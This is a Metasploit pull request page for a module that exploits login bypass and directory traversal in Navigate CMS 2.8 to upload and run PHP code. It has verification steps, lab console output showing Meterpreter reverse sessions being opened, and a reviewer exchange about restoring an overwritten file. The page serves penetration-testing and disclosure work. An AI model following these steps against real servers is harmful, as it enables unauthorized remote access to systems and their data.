
Navigate CMS Unauthenticated Remote Code Execution #10704

Merged
merged 7 commits into from Oct 4, 2018

Conversation

Pyriphlegethon
Contributor

@Pyriphlegethon Pyriphlegethon commented Sep 26, 2018

This module exploits two vulnerabilities in Navigate CMS 2.8 that allow an unauthenticated attacker to gain remote code execution.

Verification

  • Install Navigate CMS 2.8
    • wget http://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip
    • unzip navigate-2.8r1302.zip
    • Browse to http://localhost/setup.php
  • Start msfconsole
  • use exploit/multi/http/navigate_cms_rce
  • set RHOST <rhost>
  • check
  • Verify that The target appears to be vulnerable. is returned
  • exploit
  • Verify that a meterpreter session is opened

Example Output

msf5 > use exploit/multi/http/navigate_cms_rce
msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
RHOST => 192.168.178.45
msf5 exploit(multi/http/navigate_cms_rce) > check
[*] 192.168.178.45:80 The target appears to be vulnerable.
msf5 exploit(multi/http/navigate_cms_rce) > exploit

[*] Started reverse TCP handler on 192.168.178.35:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 192.168.178.45
[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200

meterpreter > 

@Pyriphlegethon
Contributor Author

This module overwrites navigate_info.php. I know that it is possible to register files for deletion with Msf::Exploit::FileDropper but is there a way to automatically overwrite files with their former content after successful exploitation?

@bcoles
Contributor

bcoles commented Sep 27, 2018

Is there a reason it needs to overwrite an existing file?

You can specify cleanup code in a cleanup method. This method will run after the module has completed, regardless of whether exploitation was successful. You could exploit the same vulnerability to attempt to overwrite the old file with its old contents.

There are a few examples in the framework. Perhaps check out modules/exploits/linux/http/dlink_dcs931l_upload.rb which overwrites a shell script to gain a shell, then re-writes the old content back to the file in cleanup.

It's worth noting that if the application depends on the overwritten file to be exploitable, and you mess up, then you're unable to re-exploit and repair the file, which is bad.

@jrobles-r7 jrobles-r7 self-assigned this Oct 1, 2018
@jrobles-r7 jrobles-r7 merged commit 9772972 into rapid7:master Oct 4, 2018
jrobles-r7 added a commit that referenced this pull request Oct 4, 2018
@jrobles-r7
Contributor

msf5 exploit(multi/http/navigate_cms_rce) > exploit
[*] Exploiting target 172.22.222.200

[*] Started reverse TCP handler on 172.22.222.130:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.130:4444 -> 172.22.222.200:51038) at 2018-10-04 06:46:23 -0500
[*] Session 1 created in the background.
msf5 exploit(multi/http/navigate_cms_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : DESKTOP-IPOGIJR
OS          : Windows NT DESKTOP-IPOGIJR 10.0 build 17134 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >

msjenkins-r7 pushed a commit that referenced this pull request Oct 4, 2018
@jrobles-r7
Contributor

jrobles-r7 commented Oct 4, 2018

Release Notes

The exploit/multi/http/navigate_cms_rce module exploits login bypass and directory traversal vulnerabilities in Navigate CMS v2.8 to upload and execute PHP code.
